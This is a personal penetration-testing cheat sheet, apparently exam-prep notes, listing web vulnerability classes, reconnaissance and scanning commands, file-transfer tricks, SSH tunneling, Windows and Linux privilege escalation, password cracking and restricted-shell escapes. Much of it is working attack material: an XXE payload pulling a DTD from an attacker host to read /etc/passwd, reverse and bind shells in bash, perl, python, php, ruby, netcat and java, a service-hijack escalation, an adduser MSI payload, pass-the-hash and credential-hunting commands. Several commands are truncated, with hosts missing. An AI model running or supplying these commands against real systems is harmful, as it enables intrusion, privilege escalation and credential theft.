
Web notes

Vuln types

Client side:
    session fixation
    open redirects
    header injection
    websockets / localStorage tests
    websockets hijacking
    jsonp leaks
    OAuth token theft
    path-relative stylesheet import
    same origin method execution
    http response splitting/smuggling
    names and email addresses appearing in HTML comments
    reverse tabnabbing
    referer token leakage

Server side:
        + sql / nosql
        + cmd
        + expression language (
        + template injection
        + Server Side Include (.shtml)
        + server side javascript execution
        + ldap
        + CSS
            + extract attributes with input[value^=""]
            + extract whatever with fonts (
        + mail header
        + xpath
        + log injection
        + OGNL

        + cors
        + host header manipulation
            + host header poisoning (
        + TRACE enabled
        + clickjacking
        + session timeouts
        + login throttling (anti-bruteforce)
        + _method=PUT etc checks (csrf bypass...)
        + cross-domain policy 
        + cookie scope
        + sensitive data in url
        + directory listings
        + caching of sensitive data
        + backdoor cookies/parameters
        + SMTP not checking server identity
        + methods not checked/restricted (GET, PUT etc)

    path traversal
    local/remote file inclusion
    file upload
    auth bypass
        + pass reset: the same token for all users (in given second)
    parameter pollution
    race conditions
    user enumeration
    mass assignments / autobinding / Object injection
    regex bypass/eval/dos ([a-zA-Z]+)*, (a+)+ or (a|a?)+ etc)
    search indexing of credentials (private data cached by google etc)

    memory leaks:
    subdomain takeover:
        - unused subdomains and aliases (CNAME)
        - CNAME pointing to unregistered domain
        - trailing dots (bypassess in cloud providers)
        - same-site scripting (

    password bruteforce

    httpoxy (mostly php 7.0.8)
    path equivalence vulnerability
    image tragic
    insecure direct object reference
    session puzzling
    smtp header injection
    rounding errors / integer overflows
    table truncation
    hidden files (.git, .DS_Store)
    broken logout functions
    format string (%s, %d, {0:x})
    bad hexadecimal concatenation (when two different hashes are converted to the same value)
    null byte injection
    pdf export injection (
    csv injection
    side-channel leaks with f.e. Chrome Auditor or Windows Defender (
    old (open)ssl
    utf8 normalization/Case Mapping Collisions (utf.toLower() == some_ascii) (














#ASP NET (dotnet)




#Side channels


#Security headers

Disable completely: Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Expires: -1 Pragma: no-cache

#### #CORS
* if Access-Control-Allow-Credentials not present:
    + client side cache poisoning (reflected xss in custom header)
    + server side cache poisoning

#### #HTTPS
* http should redirect (301) to https
* HSTS (Strict-Transport-Security: max-age=31536000; includeSubDomains; preload)
* mixed contents
* upgrade-insecure-requests CSP
    + ```<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">```
    + ```Content-Security-Policy: upgrade-insecure-requests```

#### #XXE

xml request: <?xml version=”1.0” encoding=”ISO-8859-1”?> <!DOCTYPE xxe [ <!ENTITY % bbb SYSTEM “http://attacker/xxe.dtd”> %bbb; %encja; ]>&test;

xxe.dtd on attacker server: <?xml version=”1.0” encoding=”UTF-8”?> <!ENTITY % test SYSTEM “php://filter/convert.base64-encode/resource=/etc/passwd”> <!ENTITY % encja ‘<!ENTITY test SYSTEM “;”>’> ```


Technologies and tools








#webdav / iis 6


* Manual check 
    ```openssl s_client -no_tls1 -no_ssl3 -connect host:port```


* --verify may returns 0 even on error
gpg --verify somefile.sig
# when somefile.sig contains correctly clearsigned data (may have nothing to do with somefile), cmd will return 0


Arbitrary write to RCE



* netcat options
    -C  - add line feed \r
    -n - no DNS

* bind shell
    # listen on $ip
    +------+                 +--------------+
    |A $ip|  <- commands <- |B <our machine|
    +------+                 +--------------+
    A: nc -nlvp 4444 -e cmd.exe  # on $ip machine
    B: nc -nv $ip 4444  # on our machine

* reverse shell
    # listen on <our machine>
    +------+                 +--------------+
    |A $ip|  <- commands <- |B <our machine|
    +------+                 +--------------+
    A: nc -nv <our machine> 4444 -e /bin/bash  # on $ip machine
    B: nc -nlvp 4444  # on our machine

* ncat (instead of netcat)
    # bind shell
    A: ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
    B: ncat -v $ip 4444 --ssl

    # reverse shell
    A: ncat -nv <our machine> 4444 -e /bin/bash --ssl
    B: ncat -vnl 4444 --ssl --allow $ip

* sbd (from kali linux)

* iptables
    # accept on 7777 for $ip
    iptables -I INPUT -p tcp -s $ip --dport 7777 -j ACCEPT

    # dissalow for other ips
    iptables -I INPUT -p tcp -s --dport 7777 -j DROP

* tcpdump
    -n - don't convert addresses
    -r - read from file
    -X - hex dump
    -s - snapshot length (default is 262144 bytes)
    tcpdump -n dst host port 80 -r <file to read from>.pcap
    tcpdump -A -n 'tcp[13] = 24' -r <file to read from>.pcap  # filtering by flags

* aircrack
    sudo airmon-ng check kill
    sudo airmon-ng start wlp9s0
    sudo iwconfig wlp9s0mon channel X  # for wireshark
    sudo wireshark -i wlp9s0mon
    sudo airodump-ng wlp9s0mon
    sudo airmon-ng stop wlp9s0mon && sudo systemctl start wpa_supplicant && sudo systemctl start network-manager.service


* passive
    * google
        filetype, inurl, intitle
    * GHDB (
    * theharvester
    * Netcraft
    * whois
    * Recon-ng / altdns / domain (jhaddix)
    * XXSed ( -- super old!
    * Metadata

* active
    * host
        host -t mx
            A - ip addresses
            MX - mails delicery address?
            CNAME - canonical name (alias -> canonical)
            NS - name server (DNS server domain uses)
            SOA - Start of Authority record (administrative information about the zone, zone transfer)
            SIG - todo
            KEY - todo
            AXFR - something about zone transfer?
        for ip in $(cat subdomain_list.txt); do host $; done

        # reverse lookup
        for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found"

        # dnz transfer
        host -l <domain name> <dns server address>
    * DNSRecon
    * DNSenum

* port scanning
    * types
        Connect - simplest, tcp three-way handshake (syn, syn-ack, ack), -sT option # nc -nvv -w 1 -z 3388-3390
            * quick
            * no root needed
            * easily detectable, often logged
        Stealth / SYN Scanning - without finall ack (syn, syn-ack), -sS option
            * root needed
            * rarely logged
        RST stuff
            * send "partial" packet, closed ports respond with RST, open don't respond at all
                * not working for microsoft (todo: check)
                * it's because of bug in TCP implementation, not reliable
            * FIN (only FIN bit), option -sF
            * Null (not set any bits in header)
            * Xmas (FIN, PSH, and URG bits)
        UDP, -sU option # nc -nv -u -z -w 1 160-162
            * slow
            * not responding ports marked as open|filtered, try with -sV
        SCTP Init, option -sY
            * wtf is that
        ACK - detect firewalls
            * If not filtered, both open and closed ports respond with RST
            * If filtered, no response or ICMP error
            * todo
            * like FIN etc
            * for BSD based systems
    * scripts
        ftp-bounce -> old ftp servers may send files to arbitrary host for you, may bypass firewall
        nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>
        nmap -sn -oG ping-sweep.txt
        nmap --script exploit -Pn $ip
        nmap -v -p 21 --script=ftp-anon.nse $ip-254

    * common pitfals
        + udp scan is often unreliable
        + only "interesting ports" are scaned by default
        + forgotten udp services

* rpc (port 111), shows open ports
    rpcinfo -p $ip
    showmount -e $ip  # if nfs entries above
    nmap -sV --script=nfs-showmount $ip
    rpcclient --user="" --command=enumprivs -N $ip

* smb
    * on port 137, 139 or 445 
    * null sessions
    * ls -l /usr/share/nmap/scripts/smb* 
    * scripts
        nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
        nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

        # open smb shares
        nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip

        # fingerprint / enumeration
        smbclient -L //$ip
        nmblookup -A $ip
        smbclient //MOUNT/share -I $ip -N
        nbtscan -r $ip
        enum4linux -a $ip
        rpcclient -U "" $ip

        # null sessions $ip 500 50000 dict.txt
        net use \\$ip\IPC$ "" /u:""
        smbclient -L //$ip

    * user enumeration (VRFY command)
    * smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t $ip

    * on port 161
    * onesixtyone
        echo public > community
        echo private >> community
        echo manager >> community
        for ip in $(seq 1 254);do echo 10.11.1.$ip;done > ips
        onesixtyone -c community -i ips
    * snmpwalk
        Enumerating the Entire MIB Tree
        snmpwalk -v1 -c public -v1

        Enumerating Windows Users:
        snmpwalk -c public -v1

        Enumerating Running Windows Processes:
        snmpwalk -c public -v1

        Enumerating Open TCP Ports:
        snmpwalk -c public -v1

        Enumerating Installed Software:
        snmpwalk -c public -v1
    * braa, snmpcheck
    * decode MIB numbers
        apt-get install snmp-mibs-downloader download-mibs && echo "" > /etc/snmp/snmp.conf

    * anonymous/anonymous login
    * ftp -p for passive mode

    * open resolvers
    dig +short TXT @$ip

* Random tools

#Vuln scanning

* nmap
    nmap -v -p 80 --script=http-vuln-cve2010-2861 # cold fusion
    nmap -v -p 21 --script=ftp-anon.nse  # anonymous ftp
    nmap -v -p 139, 445 --script=smb-security-mode  # smb security level
* openVAS

#File transfer/uploading

    root@kali:~# mkdir /tftp
    root@kali:~# atftpd --daemon --port 69 /tftp
    root@kali:~# cp /usr/share/windows-binaries/nc.exe /tftp/

    C:\Users\Offsec>tftp -i get nc.exe

    # install and add user
    root@kali:~# apt-get update && apt-get install pure-ftpd

    groupadd ftpgroup
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd offsec_gros -u ftpuser -d /ftphome
    pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    ln -s ../conf/PureDB 60pdb
    mkdir -p /ftphome
    chown -R ftpuser:ftpgroup /ftphome/
    /etc/init.d/pure-ftpd restart

    # download
    echo open 21> ftp.txt
    echo USER offsec_gros>> ftp.txt
    echo X3KR9LsbywChj >> ftp.txt
    echo bin >> ftp.txt
    echo GET nc.exe >> ftp.txt
    echo bye >> ftp.txt
    ftp -v -n -s:ftp.txt

    wget.exe -r ftp://offsec_gros:X3KR9LsbywChj@

* VBScript
    echo strUrl = WScript.Arguments.Item(0) > wget.vbs
    echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
    echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
    echo Err.Clear >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
    echo http.Open "GET", strURL, False >> wget.vbs
    echo http.Send >> wget.vbs
    echo varByteArray = http.ResponseBody >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
    echo strData = "" >> wget.vbs
    echo strBuffer = "" >> wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
    echo Next >> wget.vbs
    echo ts.Close >> wget.vbs

    C:\Users\Offsec>cscript wget.vbs evil.exe

* PowerShell
    echo $storageDir = $pwd > wget.ps1
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = "" >>wget.ps1
    echo $file = "new-exploit.exe" >>wget.ps1
    echo $webclient.DownloadFile($url,$file) >>wget.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

* debug.exe (win32, 64kb max)
    upx -9 nc.exe

    cp /usr/share/windows-binaries/exe2bat.exe .
    wine exe2bat.exe nc.exe nc.txt

* netcat + base64
    A: nc -lp 7777 >
    B: cat | base64 | nc $ip 7777
    A: certutil -decode

* bash
    exec 3<>/dev/tcp/; echo -en 'GET / HTTP/1.1\r\nHost:\r\n\r\n' >&3; cat <&3


* port forwarding (rinetd or iptables)
    * outbound filter to specific port -> rinetd on home computer on filtered port that redirects traffic to destination port
    cat /etc/rinetd.conf
    # bindadress bindport connectaddress connectport

* ssh tunneling
    * local
        # reach external computer listening on restricted port
        ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
        # <remote host>:<remote port> - we want connection to it
        now we connect (from filtered, internal network) to localhost:<local port to listen> -> ssh via <gateway> -> <remote host>:<remote port>

    * remote
        # expose port to external computer
        ssh <gateway> -R <remote port to bind>:<local host>:<local port>

        now we connect (from remote, public network) to <gateway>:<remote port to bind> -> ssh via <gateway> -> <local host>:<local port>

    * dynamic
        # create local socks4 proxy
        ssh -D <local proxy port> -p <remote port> <target>
        # <target> must allow traffic on <remote port>
        now we can setup proxy in our tools

    * proxychains
        ssh -f -N -R 2222: root@attacker-machine  # on internal machine. Now attacker machine listen on 2222 and tunnel traffic to internal machine

        ssh -f -N -D -p 2222 some-user@  # on attacker machine. Now we have proxy on 8080 that tunnel via ssh into internal machine (with user some-user)

        proxychains nmap --top-ports=20 -sT -Pn  # proxychains uses 8080 to tunnel trafic

    * metasploit dynamic proxy
        > route add 3
        > use auxiliary/server/socks4a
        > set SRVPORT
        > run

        > msfmap ?
        > portfwd

* HTTP Tunneling
* Deep inpsection
    * stunnel
    * HTTPTunnel

#Post exploitation

* reverse shell (from
    * bash
        bash -i >& /dev/tcp/ 0>&1

    * perl
        perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    * python
        python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);''

    * php
        php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

    * ruby
        ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

    * netcat
        nc -e /bin/sh 1234
        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

    * java
        r = Runtime.getRuntime()
        p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

* real tty (
    * python
        python -c 'import pty; pty.spawn("/bin/bash");'

    * sh
        /bin/sh -i

    * perl
        perl -e 'exec "/bin/sh";'
* stty (
    # In reverse shell
    $ python -c 'import pty; pty.spawn("/bin/bash")'

    # In Kali
    $ stty raw -echo
    $ fg

    # In reverse shell
    $ reset
    $ export SHELL=bash
    $ export TERM=xterm-256color
    $ stty rows <num> columns <cols>

Privilege escalation


* common
    tree /F /A
    echo %username%
    net users
    net start

    # tasks
    schtasks /query /fo LIST /v

    tasklist /SVC
    tasklist /svc /FI "PID eq 1"

    rem Open TCP Port 445  inbound and outbound
    netsh firewall add portopening TCP 445 "Zoo TCP Port 445"

    runas /user:<UserName> program
    runas /noprofile /user:Administrator cmd 

    # delete dir with files
        rd /s /q dir
    # delete file
        del file

    # network
    netstat -ano
    route print
    arp -A
    net config Workstation
    netsh firewall show state / config

    # add user with group administrators
        net user /add <username> <password>
        net localgroup administrators <username> /add
        net localgroup "Remote Desktop Users" <username> /add

    # list drives
        wmic logicaldisk get caption

    # run as system (from admin)
        # on newer windows
            reg add HKLM\System\CurrentControlSet\Control\Windows /v NoInteractiveServices /d 0
            sc start ui0detect
        sc create cmdsvc binpath= "cmd /K start" type= own type= interact
        sc start cmdsvc

    # run as system 2 (from admin)
        psexec –i –s cmd.exe

    # powershell from cmd
    powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\A.ps1; A }"

* Admins in domain
* Creds in config files (gpp)
    C:\>dir /b /s web.config
    sysprep.inf/.xml - encrypted, but priv keys are known (

    dir c:\*vnc.ini /s /b /c
    dir c:\*ultravnc.ini /s /b /c
    dir c:\ /s /b /c | findstr /si *vnc.ini
    findstr /si password *.txt *.xml *.ini
    reg query HKLM /f password /t REG_SZ /s
    reg query HKCU /f password /t REG_SZ /s
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
    reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

* metasploit's getsystem

* PyInstaller (python script to standalone binary)
    python --onefile

* Crosscompiling from linux - mingw
    i686-w64-mingw32-gcc 646.c -o 646.exe -lws2_32

* Services
    * list
        net start
        sc queryex type= service state= all | find /i "NATION"
    * Folder permissions (service's binary replace etc.)
        icacls path-to-exe

    * Services permissions
        # download:
        # list user's obejcts
            accesschk.exe /accepteula -uwcqv "Authenticated Users" *
            accesschk.exe /accepteula -ucqv upnphost # or SSDPSRV

        # universal WinXP SP0/SP1 PE
             sc config upnphost binpath= "C:\Documents and Settings\IWAM_BOB\Desktop\tmp\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
             sc config upnphost obj= ".\LocalSystem" password= ""
             sc qc upnphost
             net start upnphost

        #list properties
            sc qc "Vulnerable Service"
        # check privileges
            sc qprivs "Service name"

    * Unquoted Service Paths ( (exploit/windows/local/trusted_service_path)
        # list unquoted services
        wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

        # batch
        @echo off
        for /f "tokens=2" %%I in ('sc query^|find "SERVICE_NAME:"') do Call :CHECK_SVR %%I

        sc qc %1|find "DISPLAY"
        sc qc %1|find "BINARY"

        # if service contains space (eg. C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe) windows will try execute in order:
        C:\Program Files.exe
        C:\Program Files (x86)\Program.exe
        C:\Program Files (x86)\Program Folder\A.exe
        C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

* Registry
    * common
        reg /?
    * permissions
        check with Registry Editor key ImagePath in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
            - reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Apache" /t REG_EXPAND_SZ /v ImagePath /d "C:\xampp\shell.exe" /f
            - restart service
        subinacl.msi (
        subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service" /display
    * AlwaysInstallElevated registry key
            reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
            reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

        if enabled create msi file:
            msfvenom -f msi-nouac -p windows/adduser USER=eviladmin PASS=password -o add_user.msi

        upload msi and run:
            msiexec /quiet /qn /i malicious.msi 

* DLL things
    * dll-injector (
    * hijacking
        + check for dll dependencies ( / listdlls)
        DLL search dirs in order:
            The directory from which the application is loaded
            The current working directory
            Directories in the system PATH environment variable
            Directories in the user PATH environment variable
* Kernel exploit
    wmic qfe get Caption,Description,HotFixID,InstalledOn
    then check with f.e.

* Task Scheduler
    Windows 2000, XP, or 2003 only
    local administrator -> SYSTEM

    check if running:
        net start "Task Scheduler"
    add to ts: at 06:42 /interactive "C:\Documents and Settings\test\Local Settings\Temp\Payload.exe"

    * check for gui tols running as SYSTEM, find "open file" dialog, open cmd.exe ( : 11:00)

* named pipe (
* Shatter attacks
* tools
    wpc (
    pysecdump (
    lsadump / mimikatz (
* Pwdump and fgdump (extract hashes from windows SAM memory injecting DLL to LSASS)
    * SAM - Security Account Manager, SYSKEY (from Windows NT 4.0 PS3) partially encrypts it
    * Storing passwords
        * LAN Manager - DES encrypted (Windows NT <= Windows 2003 only)
        * NT LAN Manager - MD4 hashing
    * LSASS - Local Security Authority Subsystem
* ophcrack - cracker for hashes from fgdump

* Windows Credentials Editor (
* Pass-The-Hash (
    + incognito (
    export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
    pth-winexe -U administrator% // cmd
* [sysret](
* rotten potato (
    + from network/admin service to SYSTEM
* hot potato (


* sudo -l / sudo -e
* CVE-2015-5602 (
    * when sudoedit have two * in path
* suid-debug and MALLOC_CHECK_ envvar
* setuid
    find / -perm -6000 2>/dev/null
    find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
    find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
    find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
    /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
* enum
    uname -a
    netstat -tulpn
    ps aux | grep root
    find / -writable -type d 2>/dev/null      # world-writeable folders
* NFS server
    * mout root
        # apt install nfs-common
        rpcinfo -p $ip  # list
        showmount -e $ip  # export list, check if / is accessible
        mount -o nolock -t nfs $ip:/ /tmp/nfs
        # now add ssh key to authorized_keys or whatever
    * edit /etc/exports and reboot

#Passwords brute-force & dumping

* key-space search
    * crunch
* password profiling
    cewl -m 6 -w domain-cewl.txt
* password mutating
    john --wordlist=list-cewl.txt --rules --stdout > mutated.txt

    john  # for fgdump
    john --wordlist=domain-cewl.txt --rules --stdout > mutated.txt
    unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
* medusa, ncrack, hydra
    medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
    ncrack -vv --user offsec -P password-file.txt rdp://$ip
    hydra -P password-file.txt -v $ip snmp
    hydra -l root -P password-file.txt $ip ssh
* hash-identifier (

#Restricted shell escape

* start with env and PATH
* ls replacements
    echo path/to/dir/*
* export -p
    * check if any variable is writeable
* copy files to PATH
* copy to home dir and something with ~
* chroot
* mounting filesystem
* editors (vi, vim)
    :set shell=/bin/bash

    :! /bin/bash
    : python

    # assumption that "[esc]:pre" uses /bin/mail to notify the user of a vi crash
    rbash # touch bin mail
    rbash # chmod 777 bin mail
    rbash # export IFS="/"
    rbash # vi
    File preserved.

    # open manual (with less)
* commands to try:
    awk 'BEGIN {system("/bin/sh")}'
    find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
    less, more, man with :!/bin/sh
    less with :e (examine)

    python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
    perl -e 'exec "/bin/sh";'
    perl: exec "/bin/sh";
    ruby: exec "/bin/sh"
    lua: os.execute('/bin/sh')
    irb(main:001:0> exec "/bin/sh"

    iptables --modprobe=<cmd>
    tar --checkpoint-action=<cmd>
    rsync -e <cmd>
    scp -S <command> a b:
    lynx !
    mail "~v"
* write to file without echo -> tee
    echo "evil script code" | tee
    tee -a  # append
* stuff from bash_profile are running before restricted shell
* mirc32.exe -> /exec with cmd.exe (
* set handler for telnet:// uri in browser to cmd.exe
* wine: `start /unix /bin/sh`

#Path traversal


#Crap it music